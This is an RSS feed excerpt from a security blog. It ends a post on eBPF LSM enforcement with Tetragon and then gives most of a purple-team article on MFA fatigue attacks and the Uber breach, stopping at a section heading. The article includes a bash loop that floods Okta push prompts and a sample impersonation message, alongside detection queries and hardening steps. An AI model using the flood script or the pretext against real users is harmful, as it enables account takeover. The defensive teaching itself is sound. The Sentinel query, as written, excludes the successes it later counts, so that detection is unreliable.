<p><strong><code class="" data-line="">bpf_send_signal(SIGKILL)</code> vs returning an error code.</strong> Tetragon&#8217;s <code class="" data-line="">Sigkill</code> action uses <code class="" data-line="">bpf_send_signal()</code> rather than returning a negative error from the LSM hook. This means the syscall may return before the signal is delivered — there can be a single instruction window. For critical enforcement paths, combining LSM deny (return <code class="" data-line="">-EPERM</code>) with <code class="" data-line="">bpf_send_signal(SIGKILL)</code> is the belt-and-suspenders approach; Tetragon&#8217;s maintainers have documented which actions use which mechanism.</p>
<hr />
<h2 id="quick-reference">Quick Reference</h2>
<table>
<thead>
<tr>
<th>What you want</th>
<th>Command</th>
</tr>
</thead>
<tbody>
<tr>
<td>Is BPF LSM enabled?</td>
<td><code class="" data-line="">cat /sys/kernel/security/lsm</code> (look for <code class="" data-line="">bpf</code>)</td>
</tr>
<tr>
<td>What LSM programs are loaded?</td>
<td><code class="" data-line="">bpftool prog list | grep lsm</code></td>
</tr>
<tr>
<td>What Tetragon policies exist?</td>
<td><code class="" data-line="">kubectl get tracingpolicies -A</code></td>
</tr>
<tr>
<td>Audit events (before enforce)</td>
<td><code class="" data-line="">tetra getevents --event-types PROCESS_KPROBE</code></td>
</tr>
<tr>
<td>Watch Tetragon enforcement</td>
<td><code class="" data-line="">kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -f</code></td>
</tr>
<tr>
<td>Test a policy safely</td>
<td>Set <code class="" data-line="">action: Post</code> before <code class="" data-line="">action: Sigkill</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Tetragon action</th>
<th>Effect</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">Post</code></td>
<td>Log event only — audit mode</td>
</tr>
<tr>
<td><code class="" data-line="">Sigkill</code></td>
<td>Send SIGKILL from kernel context</td>
</tr>
<tr>
<td><code class="" data-line="">Override</code></td>
<td>Return custom error code to syscall caller</td>
</tr>
<tr>
<td><code class="" data-line="">FollowFD</code></td>
<td>Track file descriptor for future hook correlation</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>LSM hook</th>
<th>Protects</th>
</tr>
</thead>
<tbody>
<tr>
<td><code class="" data-line="">security_bprm_check</code></td>
<td>exec (block shell spawning)</td>
</tr>
<tr>
<td><code class="" data-line="">security_inode_permission</code></td>
<td>file access (block reads/writes to sensitive paths)</td>
</tr>
<tr>
<td><code class="" data-line="">security_socket_connect</code></td>
<td>outbound connections (block C2 connections)</td>
</tr>
<tr>
<td><code class="" data-line="">security_capable</code></td>
<td>capability escalation (block CAP_SYS_ADMIN attempts)</td>
</tr>
</tbody>
</table>
<hr />
<h2 id="key-takeaways">Key Takeaways</h2>
<ul>
<li>LSM eBPF Tetragon enforces at the syscall boundary — the operation either never completes or returns an error before the kernel performs the action, with no detect-and-respond window</li>
<li>Falco, Datadog, and sidecar-based tools detect events after the syscall returns; this is architectural, not a product limitation — they operate at a layer where the operation has already occurred</li>
<li><code class="" data-line="">BPF_PROG_TYPE_LSM</code> attaches eBPF programs directly to Linux Security Module hooks; available on kernel 5.7+, enabled on all current EKS/GKE LTS node images</li>
<li>Tetragon sends <code class="" data-line="">SIGKILL</code> from kernel context using <code class="" data-line="">bpf_send_signal()</code> — not from a userspace agent polling an audit log</li>
<li>Always run Tetragon policies in <code class="" data-line="">Post</code> (audit) mode for 48+ hours before switching to <code class="" data-line="">Sigkill</code> — legitimate workloads trigger many of the same LSM hooks that attacks use</li>
<li>The combination of kprobe (rich context: pod name, namespace, process tree) and LSM (enforcement) gives Tetragon context-aware kernel enforcement that static profiles (AppArmor, seccomp) cannot provide dynamically</li>
</ul>
<hr />
<h2 id="whats-next">What&#8217;s Next</h2>
<p>LSM hooks prevent operations in the moment. But after an incident — when enforcement failed, or when you&#8217;re doing post-hoc forensics — the question changes: what did this process spawn, what files did it touch, what connections did it make, and in what order? Answering that from logs alone is guesswork. Answering it from kernel-level process lineage is reconstruction.</p>
<p>EP13 covers how eBPF kprobe hooks on <code class="" data-line="">fork</code> and <code class="" data-line="">exec</code> build a complete, tamper-resistant process tree. Even after the attacker&#8217;s process has exited, the record remains — in kernel maps, exported to a persistent store, tied to the pod that ran it.</p>
<p><em>Next: <a href="/process-lineage-ebpf/">process lineage with eBPF — reconstructing what happened after the fact</a></em></p>
<p>Get EP13 in your inbox when it publishes → <a href="https://linuxcent.com/subscribe">linuxcent.com/subscribe</a></p>
<p><a class="a2a_button_mastodon" href="https://www.addtoany.com/add_to/mastodon?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Mastodon" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_whatsapp" href="https://www.addtoany.com/add_to/whatsapp?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="WhatsApp" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_x" href="https://www.addtoany.com/add_to/x?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="X" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_copy_link" href="https://www.addtoany.com/add_to/copy_link?linkurl=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&amp;linkname=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" title="Copy Link" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share#url=https%3A%2F%2Flinuxcent.com%2Febpf-lsm-tetragon-runtime-security%2F&#038;title=LSM%20and%20Tetragon%20%E2%80%94%20When%20the%20Kernel%20Says%20No" data-a2a-url="https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/" data-a2a-title="LSM and Tetragon — When the Kernel Says No"></a></p><p>The post <a href="https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/">LSM and Tetragon — When the Kernel Says No</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://linuxcent.com/ebpf-lsm-tetragon-runtime-security/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">1841</post-id>	</item>
		<item>
		<title>MFA Fatigue Attacks: How Uber Got Breached and How to Stop It</title>
		<link>https://linuxcent.com/mfa-fatigue-attack-uber-okta/</link>
					<comments>https://linuxcent.com/mfa-fatigue-attack-uber-okta/#respond</comments>
		
		<dc:creator><![CDATA[Vamshi Krishna Santhapuri]]></dc:creator>
		<pubDate>Wed, 10 Jun 2026 02:00:00 +0000</pubDate>
				<category><![CDATA[Purple Team]]></category>
		<category><![CDATA[Identity Security]]></category>
		<category><![CDATA[MFA]]></category>
		<category><![CDATA[MFA Fatigue]]></category>
		<category><![CDATA[Okta]]></category>
		<category><![CDATA[OWASP]]></category>
		<category><![CDATA[Uber Breach]]></category>
		<guid isPermaLink="false">https://linuxcent.com/?p=1855</guid>

					<description><![CDATA[<p><span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span>MFA fatigue attacks exploit push-based MFA UX — not weak passwords. Anatomy of the Uber and Okta breaches and why hardware keys are the only structural fix.</p>
<p>The post <a href="https://linuxcent.com/mfa-fatigue-attack-uber-okta/">MFA Fatigue Attacks: How Uber Got Breached and How to Stop It</a> appeared first on <a href="https://linuxcent.com">Linuxcent</a>.</p>
]]></description>
										<content:encoded><![CDATA[<span class="span-reading-time rt-reading-time" style="display: block;"><span class="rt-label rt-prefix">Reading Time: </span> <span class="rt-time"> 10</span> <span class="rt-label rt-postfix">minutes</span></span><style>
pre{position:relative;background:#1e1e1e;color:#d4d4d4;
    padding:16px 16px 16px 20px;border-radius:6px;overflow-x:auto;
    font-family:'JetBrains Mono','Fira Code','Cascadia Code',Consolas,'Courier New',monospace;
    font-size:.88em;line-height:1.6;border-left:4px solid #555}
code{background:#f4f4f4;padding:2px 5px;border-radius:3px;font-size:.9em}
pre code{background:transparent;padding:0;color:inherit}
pre[data-lang="bash"],pre[data-lang="sh"],
pre[data-lang="shell"],pre[data-lang="zsh"]{border-left-color:#4ec9b0}
pre[data-lang="yaml"],pre[data-lang="json"],
pre[data-lang="toml"],pre[data-lang="xml"]{border-left-color:#569cd6}
pre[data-lang="python"],pre[data-lang="go"],pre[data-lang="rust"],
pre[data-lang="java"],pre[data-lang="c"],pre[data-lang="cpp"]{border-left-color:#c586c0}
pre[data-lang="text"],pre[data-lang="output"],
pre[data-lang="console"]{border-left-color:#888}
.lc-copy-btn{position:absolute;top:8px;right:8px;background:#2d2d2d;color:#ccc;
    border:1px solid #444;border-radius:4px;padding:3px 9px;font-size:.75em;
    font-family:system-ui,sans-serif;cursor:pointer;opacity:0;
    transition:opacity .15s,background .15s;line-height:1.6}
pre:hover .lc-copy-btn{opacity:1}
.lc-copy-btn:hover{background:#3a3a3a;color:#fff}
.lc-copy-btn.copied{color:#4ec9b0;border-color:#4ec9b0}
.lc-lang-badge{position:absolute;top:8px;left:20px;font-family:system-ui,sans-serif;
    font-size:.7em;color:#666;text-transform:uppercase;letter-spacing:.04em;
    line-height:1;pointer-events:none;opacity:0;transition:opacity .15s}
pre:hover .lc-lang-badge{opacity:1}
table{border-collapse:collapse;width:100%;margin:16px 0}
th,td{border:1px solid #ddd;padding:10px 14px;text-align:left}
th{background:#f0f0f0;font-weight:600}
tr:nth-child(even){background:#fafafa}
</style>
<p><script>
(function(){
  if(window.__lcCodeEnhanced)return;
  window.__lcCodeEnhanced=true;
  function enhance(){
    document.querySelectorAll('pre').forEach(function(pre){
      var code=pre.querySelector('code');
      var lang='';
      if(code){var m=(code.className||'').match(/language-(\S+)/);if(m)lang=m[1].toLowerCase();}
      if(lang)pre.setAttribute('data-lang',lang);
      if(lang){var badge=document.createElement('span');badge.className='lc-lang-badge';badge.textContent=lang;pre.insertBefore(badge,pre.firstChild);}
      var btn=document.createElement('button');
      btn.className='lc-copy-btn';btn.textContent='Copy';btn.setAttribute('aria-label','Copy code to clipboard');
      pre.appendChild(btn);
      btn.addEventListener('click',function(){
        var text=code?code.innerText:pre.innerText;
        if(navigator.clipboard&&window.isSecureContext){
          navigator.clipboard.writeText(text).then(function(){ok(btn);}).catch(function(){fb(text,btn);});
        }else{fb(text,btn);}
      });
    });
  }
  function ok(btn){btn.textContent='Copied!';btn.classList.add('copied');setTimeout(function(){btn.textContent='Copy';btn.classList.remove('copied');},2000);}
  function fb(text,btn){
    try{var ta=document.createElement('textarea');ta.value=text;ta.style.cssText='position:fixed;left:-9999px;top:-9999px;opacity:0';document.body.appendChild(ta);ta.select();document.execCommand('copy');document.body.removeChild(ta);ok(btn);}
    catch(e){btn.textContent='✗ Failed';setTimeout(function(){btn.textContent='Copy';},2000);}
  }
  if(document.readyState==='loading'){document.addEventListener('DOMContentLoaded',enhance);}else{enhance();}
})();
</script></p>
<p><a href="/what-is-purple-team-security/">What is purple team security</a> → <a href="/owasp-top-10-cloud-infrastructure/">OWASP Top 10 mapped to cloud infrastructure</a> → <a href="/cloud-security-breaches-2020-2025/">Cloud security breaches 2020–2025</a> → <a href="/broken-access-control-aws/">Broken access control in AWS</a> → <strong>MFA fatigue attacks</strong></p>
<hr />
<h2 id="tldr">TL;DR</h2>
<ul>
<li>An <strong>MFA fatigue attack</strong> exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering</li>
<li>Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne</li>
<li>The attack works because push MFA creates a UX habit: &#8220;tap accept&#8221; is a trained response, not a decision</li>
<li>Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail</li>
<li>The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not &#8220;number matching&#8221; alone</li>
<li>Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context</li>
</ul>
<hr />
<blockquote>
<p><strong>OWASP Mapping:</strong> A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.</p>
</blockquote>
<hr />
<h2 id="the-big-picture">The Big Picture</h2>
<pre><code class="" data-line="">┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────&#x25b6; username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────&#x25b6; Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── &quot;Hi, I&#039;m from IT support.                           │
│                  Please accept the next push.&quot;                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────&#x25b6; Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN&#039;T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. WhatsApp message                │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘
</code></pre>
<p>An <strong>MFA fatigue attack</strong> is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user&#8217;s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user&#8217;s willingness to tap &#8220;deny&#8221; indefinitely.</p>
<hr />
<h2 id="the-uber-breach-anatomy-minute-by-minute">The Uber Breach: Anatomy Minute by Minute</h2>
<p>September 15, 2022. The attacker&#8217;s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.</p>
<p><strong>The credential acquisition:</strong> Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for an Uber contractor&#8217;s Uber corporate account.</p>
<p><strong>The MFA flood:</strong></p>
<p>The contractor&#8217;s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor&#8217;s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.</p>
<p><strong>The WhatsApp message:</strong></p>
<p>The attacker sent a WhatsApp message to the contractor&#8217;s number, claiming to be from Uber IT support:</p>
<blockquote>
<p>&#8220;Hi, this is the Uber IT support team. We&#8217;re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.&#8221;</p>
</blockquote>
<p>The contractor accepted the next push notification.</p>
<p><strong>Post-authentication enumeration:</strong></p>
<p>With an authenticated session, the attacker accessed Uber&#8217;s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.</p>
<p><strong>The blast radius:</strong></p>
<p>With Thycotic admin access, the attacker retrieved credentials for:<br />
&#8211; AWS IAM accounts<br />
&#8211; GCP service accounts<br />
&#8211; Google Workspace admin<br />
&#8211; VMware vSphere<br />
&#8211; Slack workspace admin<br />
&#8211; HackerOne bug bounty program admin (including details of open security reports)</p>
<p>The entire Uber infrastructure was accessible from one contractor&#8217;s push notification acceptance.</p>
<p><strong>What Uber&#8217;s logs showed:</strong></p>
<pre><code class="" data-line="">2022-09-15T02:17:00Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] user=contractor@uber.com  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] user=contractor@uber.com  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] user=contractor@uber.com  connection=established  ip=&lt;attacker&gt;
</code></pre>
<p>Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.</p>
<hr />
<h2 id="red-phase-simulating-mfa-fatigue">Red Phase: Simulating MFA Fatigue</h2>
<h3 id="what-the-attack-looks-like-in-tooling">What the Attack Looks Like in Tooling</h3>
<p>MFA fatigue attacks are conducted manually — an attacker with valid credentials and knowledge of which MFA system the target uses. No special tooling is required for the attack itself. What can be simulated:</p>
<p><strong>Option 1: Repeated legitimate login attempts (test account only)</strong></p>
<pre><code class="" data-line=""># DO NOT run against production accounts or accounts you don&#039;t own

# Using Okta API to authenticate (test environment only)
TEST_USERNAME=&quot;testuser@yourdomain.com&quot;
TEST_PASSWORD=&quot;TestPassword123!&quot;
OKTA_DOMAIN=&quot;your-org.okta.com&quot;

for i in {1..5}; do
  echo &quot;Attempt $i at $(date +%T)&quot;
  response=$(curl -s -X POST \
    &quot;https://${OKTA_DOMAIN}/api/v1/authn&quot; \
    -H &quot;Content-Type: application/json&quot; \
    -d &quot;{\&quot;username\&quot;: \&quot;${TEST_USERNAME}\&quot;, \&quot;password\&quot;: \&quot;${TEST_PASSWORD}\&quot;}&quot;)

  status=$(echo &quot;$response&quot; | jq -r &#039;.status&#039;)
  echo &quot;  Status: $status&quot;

  if [ &quot;$status&quot; = &quot;MFA_CHALLENGE&quot; ]; then
    state_token=$(echo &quot;$response&quot; | jq -r &#039;.stateToken&#039;)
    factor_id=$(echo &quot;$response&quot; | jq -r &#039;._embedded.factors[] | select(.factorType == &quot;push&quot;) | .id&#039;)
    echo &quot;  Factor ID: $factor_id (push notification triggered)&quot;

    # In a real attack, the attacker would poll for the MFA response:
    echo &quot;  Waiting 10 seconds for user to respond...&quot;
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done
</code></pre>
<p><strong>Option 2: Tabletop exercise (no credentials required)</strong></p>
<p>For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:</p>
<pre><code class="" data-line=""># Okta System Log: find users with multiple MFA failures followed by success
curl -H &quot;Authorization: SSWS ${OKTA_API_TOKEN}&quot; \
  &quot;https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\&quot;user.authentication.auth_via_mfa\&quot;&amp;limit=1000&quot; | \
  jq &#039;
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == &quot;FAILURE&quot;)] | length,
      successes: [.[] | select(.outcome.result == &quot;SUCCESS&quot;)] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  &#039;
</code></pre>
<p>Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.</p>
<hr />
<h2 id="blue-phase-detection-across-identity-providers">Blue Phase: Detection Across Identity Providers</h2>
<h3 id="okta-push-notification-flood">Okta: Push Notification Flood</h3>
<pre><code class="" data-line=""># Okta System Log — detect repeated push failures from same user
# Query for: &gt;3 push failures within 10 minutes for same user
curl -H &quot;Authorization: SSWS ${OKTA_API_TOKEN}&quot; \
  &quot;https://your-org.okta.com/api/v1/logs?filter=eventType+eq+\&quot;user.authentication.auth_via_mfa\&quot;+and+outcome.result+eq+\&quot;FAILURE\&quot;&amp;since=$(date -u -d &#039;24 hours ago&#039; +%Y-%m-%dT%H:%M:%SZ)&quot; | \
  jq &#039;
    group_by(.actor.id, (.published[0:16])) |
    map(select(length &gt;= 3)) |
    map({
      user: .[0].actor.displayName,
      window: .[0].published[0:16],
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  &#039;
</code></pre>
<h3 id="azure-ad-conditional-access-logs">Azure AD: Conditional Access Logs</h3>
<pre><code class="" data-line=""># Azure AD: MFA push denial flood detection (using Azure CLI)
az monitor activity-log list \
  --start-time &quot;$(date -u -d &#039;24 hours ago&#039; +%Y-%m-%dT%H:%M:%SZ)&quot; \
  --query &quot;[?contains(operationName.value, &#039;MFA&#039;)].{user:caller,time:eventTimestamp,result:status.value}&quot; \
  --output table
</code></pre>
<p>In Microsoft Sentinel, the detection rule for MFA fatigue:</p>
<pre><code class="" data-line="">// Azure AD MFA Fatigue Detection — Sentinel KQL
SigninLogs
| where TimeGenerated &gt; ago(24h)
| where AuthenticationRequirement == &quot;multiFactorAuthentication&quot;
| where ResultType != &quot;0&quot;  // Non-success
| summarize
    FailureCount = count(),
    SuccessCount = countif(ResultType == &quot;0&quot;),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 10m)
| where FailureCount &gt;= 3
| where SuccessCount &gt;= 1
| where datetime_diff(&#039;minute&#039;, EndTime, StartTime) &lt;= 30
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc
</code></pre>
<h3 id="aws-cloudtrail-console-session-after-mfa-flood">AWS CloudTrail: Console Session After MFA Flood</h3>
<p>If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:</p>
<pre><code class="" data-line=""># Find AWS console login events from unusual IPs
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time &quot;$(date -d &#039;24 hours ago&#039; --iso-8601=seconds)&quot; \
  --query &#039;Events[].{Time:EventTime,User:Username,IP:CloudTrailEvent}&#039; \
  --output json | \
  jq &#039;.[] | {
    time: .Time,
    user: .User,
    ip: (.IP | fromjson | .sourceIPAddress),
    mfa: (.IP | fromjson | .additionalEventData.MFAUsed)
  }&#039;
</code></pre>
<h3 id="what-a-guardduty-alert-looks-like-for-this-attack">What a GuardDuty Alert Looks Like for This Attack</h3>
<p>GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:</p>
<ul>
<li><code class="" data-line="">UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B</code> — console login from unusual geographic location or Tor exit node</li>
<li><code class="" data-line="">Discovery:IAMUser/AnomalousBehavior</code> — if the attacker begins enumerating IAM after console access</li>
</ul>
<p>The gap: GuardDuty&#8217;s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.</p>
<hr />
<h2 id="purple-phase-the-structural-fix">Purple Phase: The Structural Fix</h2>
<h3 id="fix-1-replace-push-mfa-with-fido2-hardware-keys-for-tier-0-accounts">Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)</h3>
<p>This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.</p>
<pre><code class="" data-line=""># Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# CLI example using Okta API:

# Create a new authentication policy requiring hardware authenticator
curl -X POST \
  &quot;https://your-org.okta.com/api/v1/policies&quot; \
  -H &quot;Authorization: SSWS ${OKTA_API_TOKEN}&quot; \
  -H &quot;Content-Type: application/json&quot; \
  -d &#039;{
    &quot;name&quot;: &quot;Admin Hardware Key Policy&quot;,
    &quot;type&quot;: &quot;ACCESS_POLICY&quot;,
    &quot;status&quot;: &quot;ACTIVE&quot;,
    &quot;description&quot;: &quot;Requires FIDO2 hardware key for admin access&quot;
  }&#039;
</code></pre>
<p><strong>Phasing hardware keys across an organization:</strong></p>
<table>
<thead>
<tr>
<th>Tier</th>
<th>Examples</th>
<th>Timeline</th>
</tr>
</thead>
<tbody>
<tr>
<td>Tier 0 — immediate</td>
<td>Cloud admin, IAM admin, Okta admin, DNS admin</td>
<td>Week 1</td>
</tr>
<tr>
<td>Tier 1 — 30 days</td>
<td>All engineers with production access</td>
<td>Month 1</td>
</tr>
<tr>
<td>Tier 2 — 90 days</td>
<td>All employees with SSO access</td>
<td>Month 3</td>
</tr>
<tr>
<td>Contractors</td>
<td>Scope-limited access, enforce at boundary</td>
<td>Immediate</td>
</tr>
</tbody>
</table>
<h3 id="fix-2-number-matching-intermediate-mitigation">Fix 2: Number Matching (Intermediate Mitigation)</h3>
<p>If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple &#8220;approve/deny&#8221; push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.</p>
<pre><code class="" data-line=""># Duo: Enable number matching
# Duo Admin Console → Policies → Duo Push Number Matching: Required

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: &quot;Require number matching for push notifications&quot;

# Okta Verify: Enable TOTP-bound push
# Okta Admin → Security → Multifactor → Okta Verify → Enable &quot;Number Challenge&quot;
</code></pre>
<h3 id="fix-3-detect-and-block-automated-response-to-fatigue-pattern">Fix 3: Detect and Block — Automated Response to Fatigue Pattern</h3>
<pre><code class="" data-line="">#!/usr/bin/env python3
# Purple Team EP05 — MFA Fatigue Auto-Response
# Monitors Okta System Log; suspends user on fatigue pattern detection
# Run as a Lambda function or scheduled script in your SIEM pipeline

import boto3
import requests
import json
from datetime import datetime, timedelta

OKTA_DOMAIN = &quot;your-org.okta.com&quot;
OKTA_TOKEN = &quot;your-okta-api-token&quot;  # use Secrets Manager in production
SNS_TOPIC_ARN = &quot;arn:aws:sns:us-east-1:123456789012:security-alerts&quot;

def get_recent_mfa_events(hours=1):
    since = (datetime.utcnow() - timedelta(hours=hours)).strftime(&quot;%Y-%m-%dT%H:%M:%SZ&quot;)
    url = f&quot;https://{OKTA_DOMAIN}/api/v1/logs&quot;
    params = {
        &quot;filter&quot;: &#039;eventType eq &quot;user.authentication.auth_via_mfa&quot;&#039;,
        &quot;since&quot;: since,
        &quot;limit&quot;: 1000
    }
    headers = {&quot;Authorization&quot;: f&quot;SSWS {OKTA_TOKEN}&quot;}
    response = requests.get(url, params=params, headers=headers)
    return response.json()

def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    user_events = {}
    for event in events:
        user_id = event[&quot;actor&quot;][&quot;id&quot;]
        user_name = event[&quot;actor&quot;][&quot;displayName&quot;]
        result = event[&quot;outcome&quot;][&quot;result&quot;]
        timestamp = event[&quot;published&quot;]

        if user_id not in user_events:
            user_events[user_id] = {&quot;name&quot;: user_name, &quot;events&quot;: []}
        user_events[user_id][&quot;events&quot;].append({&quot;result&quot;: result, &quot;time&quot;: timestamp})

    fatigue_users = []
    for user_id, data in user_events.items():
        events_sorted = sorted(data[&quot;events&quot;], key=lambda x: x[&quot;time&quot;])
        failures = [e for e in events_sorted if e[&quot;result&quot;] == &quot;FAILURE&quot;]

        if len(failures) &gt;= failure_threshold:
            # Check if a success followed the failures
            last_failure_time = failures[-1][&quot;time&quot;]
            successes_after = [
                e for e in events_sorted
                if e[&quot;result&quot;] == &quot;SUCCESS&quot; and e[&quot;time&quot;] &gt; last_failure_time
            ]
            if successes_after:
                fatigue_users.append({
                    &quot;user_id&quot;: user_id,
                    &quot;user_name&quot;: data[&quot;name&quot;],
                    &quot;failure_count&quot;: len(failures),
                    &quot;success_after_failures&quot;: True
                })

    return fatigue_users

def alert_security_team(fatigue_users):
    sns = boto3.client(&quot;sns&quot;)
    message = f&quot;MFA FATIGUE ALERT — {len(fatigue_users)} user(s) detected:\n&quot;
    for user in fatigue_users:
        message += f&quot;  - {user[&#039;user_name&#039;]}: {user[&#039;failure_count&#039;]} failures then success\n&quot;

    sns.publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject=&quot;Purple Team: MFA Fatigue Attack Detected&quot;,
        Message=message
    )

def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
    return {&quot;fatigue_users_detected&quot;: len(fatigue_users)}
</code></pre>
<h3 id="fix-4-privileged-access-workstations-and-session-recording">Fix 4: Privileged Access Workstations and Session Recording</h3>
